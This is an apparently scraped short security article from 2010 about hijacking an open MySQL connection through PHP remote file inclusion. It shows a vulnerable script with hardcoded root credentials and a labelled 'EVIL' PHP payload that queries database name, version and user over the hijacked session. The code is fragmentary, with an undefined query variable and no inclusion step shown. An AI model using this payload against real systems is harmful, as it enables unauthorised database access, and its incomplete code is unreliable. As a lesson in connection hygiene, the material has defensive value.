Professional Documents
Culture Documents
Mysql Connection Hijacking Over Rfi: - Important of The Mysql - Close
Mysql Connection Hijacking Over Rfi: - Important of The Mysql - Close
25/05/2010
0x01 – Introduction
This article writed for focus the important of the mysql_close function. I
describe it shortly, mysql_close function kill the current link identifier's
session. In php.net documents its described like this;
mysql_close() closes the non-persistent connection to the MySQL server
that's associated with the specified link identifier. If link_identifier isn't
specified, the last opened link is used.
test.php
<?php
$host = "localhost";
$user = "root";
$pass = "rootpass";
$db = "joo";
// Current
$connect = mysql_connect($host,$user,$pass);
mysql_select_db($db,$connect);
while($lol = mysql_fetch_array($query)){
echo "we get it: ".$lol["uname"]."<br>";
}
EVIL
<?php
$evil = mysql_query("SELECT concat_ws(0x3a,database(),version(),user());");
$a = mysql_fetch_array($evil);
echo $a[0];
?>
Yes!!! We hijacked the current mysql connection session and our sql query
was executed. We see close the current connection is important. But if the
script have remote file inclusion vulnerability before the mysql_close()
function we can't do anything, because human factor in the security will
change everything.